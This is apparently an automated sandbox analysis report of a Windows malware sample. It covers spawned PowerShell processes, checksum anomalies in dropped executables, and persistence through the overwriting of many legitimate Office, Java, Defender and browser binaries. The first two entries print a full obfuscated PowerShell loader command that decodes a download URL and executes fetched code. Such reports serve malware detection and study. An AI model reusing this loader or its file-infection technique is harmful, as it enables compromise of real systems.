Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini 
,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda 
IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
Source: armsvc.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x38ee8
Source: AppVDllSurrogate.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: Au3Check.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4ace1
Source: AutoIt3_x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x11706f
Source: UcMapi.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x132706
Source: javaw.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x5043b
Source: accicons.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4235e8
Source: Au3Info_x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x49bdd
Source: lync99.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc9dfe
Source: misc.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x10df2d
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x319ee
Source: jaureg.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x95cbf
Source: jucheck.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x138baf
Source: Aut2exe_x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1c7652
Source: AutoIt3Help.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2942f
Source: aimgr.exe0.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2e51b
Source: AppSharingHookController.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x25428
Source: msoadfsb.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1a9457
Source: Microsoft.Mashup.Container.Loader.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x218c6
Source: MpDlpCmd.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x74f87
Source: Aut2exe.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1997a9
Source: dbcicons.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
Source: OfficeScrBroker.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xa8883
Source: Uninstall.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1d811
Source: OcPubMgr.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x182a45
Source: chrome.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
Source: ConfigSecurityPolicy.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x8624f
Source: MpCopyAccelerator.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3e54a
Source: OLicenseHeartbeat.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
Source: Au3Info.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
Source: MpCmdRun.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x19b52e
Source: ai.exe0.10.dr Static PE information: real checksum: 0x8a074 should be: 0xa200f
Source: SQLDumper.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x49b60
Source: VC_redist.x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xaff0b
Source: Wordconv.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1f925
Source: msoasb.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4d8e4
Source: AppSharingHookController64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x20765
Source: AppVLP.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x710ec
Source: grv_icons.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x646fd
Source: AdobeARMHelper.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x64c50
Source: MpCmdRun.exe0.10.dr Static PE information: real checksum: 0x8a074 should be: 0x146cda
Source: SDXHelper.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x38c81
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x192161
Source: msoev.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x268d3
Source: upx.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x5c64b
Source: ai.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc328b
Source: MsMpEng.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x39d03
Source: jusched.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc76e3
Source: AppVDllSurrogate64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4ec22
Source: Integrator.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: PerfBoost.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x6ed59
Source: SciTE.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x25609f
Source: AppVDllSurrogate32.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: mpextms.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xee9bf
Source: aimgr.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3b0de
Source: integrator.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: java.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x5013a
Source: joticon.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
Source: OfficeScrSanBroker.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc392a
Source: VSTOInstaller.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x23068
Source: NisSrv.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x307019
Source: officeappguardwin32.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: section name: .didat
Source: lync99.exe.10.dr Static PE information: section name: .didat
Source: misc.exe.10.dr Static PE information: section name: .didat
Source: msoadfsb.exe.10.dr Static PE information: section name: .didat
Source: msoasb.exe.10.dr Static PE information: section name: .didat
Source: msoev.exe.10.dr Static PE information: section name: .didat
Source: AppVDllSurrogate.exe.10.dr Static PE information: section name: .didat
Source: AppVDllSurrogate32.exe.10.dr Static PE information: section name: .didat
Source: OcPubMgr.exe.10.dr Static PE information: section name: .didat
Source: AppVDllSurrogate64.exe.10.dr Static PE information: section name: .didat
Source: AppVLP.exe.10.dr Static PE information: section name: .didat
Source: Integrator.exe.10.dr Static PE information: section name: .didat
Source: Microsoft.Mashup.Container.Loader.exe.10.dr Static PE information: section name: .didat
Source: AppSharingHookController.exe.10.dr Static PE information: section name: .didat
Source: officeappguardwin32.exe.10.dr Static PE information: section name: .didat
Source: OfficeScrBroker.exe.10.dr Static PE information: section name: .didat
Source: OfficeScrSanBroker.exe.10.dr Static PE information: section name: .didat
Source: PerfBoost.exe.10.dr Static PE information: section name: .didat
Source: MpCmdRun.exe.10.dr Static PE information: section name: .didat
Source: MpDlpCmd.exe.10.dr Static PE information: section name: .didat
Source: mpextms.exe.10.dr Static PE information: section name: .didat
Source: MsMpEng.exe.10.dr Static PE information: section name: .didat
Source: NisSrv.exe.10.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.10.dr Static PE information: section name: .didat
Source: SDXHelper.exe.10.dr Static PE information: section name: .didat
Source: UcMapi.exe.10.dr Static PE information: section name: .didat
Source: Wordconv.exe.10.dr Static PE information: section name: .didat
Source: VC_redist.x64.exe.10.dr Static PE information: section name: .didat
Source: integrator.exe.10.dr Static PE information: section name: .didat
Source: ConfigSecurityPolicy.exe.10.dr Static PE information: section name: .didat
Source: MpCopyAccelerator.exe.10.dr Static PE information: section name: .didat
Source: chrome.exe.10.dr Static PE information: section name: .didat
Source: Au3Check.exe.10.dr Static PE information: section name: .didat
Source: Au3Info.exe.10.dr Static PE information: section name: .didat
Source: Au3Info_x64.exe.10.dr Static PE information: section name: .didat
Source: Aut2exe.exe.10.dr Static PE information: section name: .didat
Source: Aut2exe_x64.exe.10.dr Static PE information: section name: .didat
Source: ai.exe.10.dr Static PE information: section name: .didat
Source: aimgr.exe.10.dr Static PE information: section name: .didat
Source: ai.exe0.10.dr Static PE information: section name: .didat
Source: aimgr.exe0.10.dr Static PE information: section name: .didat
Source: upx.exe.10.dr Static PE information: section name: .didat
Source: AutoIt3Help.exe.10.dr Static PE information: section name: .didat
Source: AutoIt3_x64.exe.10.dr Static PE information: section name: .didat
Source: SciTE.exe.10.dr Static PE information: section name: .didat
Source: Uninstall.exe.10.dr Static PE information: section name: .didat
Source: AdobeARMHelper.exe.10.dr Static PE information: section name: .didat
Source: armsvc.exe.10.dr Static PE information: section name: .didat
Source: jaureg.exe.10.dr Static PE information: section name: .didat
Source: jucheck.exe.10.dr Static PE information: section name: .didat
Source: jusched.exe.10.dr Static PE information: section name: .didat
Source: OLicenseHeartbeat.exe.10.dr Static PE information: section name: .didat
Source: AppSharingHookController64.exe.10.dr Static PE information: section name: .didat
Source: SQLDumper.exe.10.dr Static PE information: section name: .didat
Source: accicons.exe.10.dr Static PE information: section name: .didat
Source: dbcicons.exe.10.dr Static PE information: section name: .didat
Source: grv_icons.exe.10.dr Static PE information: section name: .didat
Source: joticon.exe.10.dr Static PE information: section name: .didat
Source: VSTOInstaller.exe.10.dr Static PE information: section name: .didat
Source: java.exe.10.dr Static PE information: section name: .didat
Source: javaw.exe.10.dr Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B88756B push ebx; iretd 2_2_00007FFD9B88756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8874FB push ebx; iretd 2_2_00007FFD9B88756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B880952 push E95B7DD0h; ret 2_2_00007FFD9B8809C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAE3B0 push eax; retf 5_2_02AAE3B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAFE02 push esp; retf 5_2_02AAFE09
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_071C0AB9 push eax; mov dword ptr [esp], ecx 5_2_071C0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_071C08D8 push eax; mov dword ptr [esp], ecx 5_2_071C0AC4

Persistence and Installation Behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
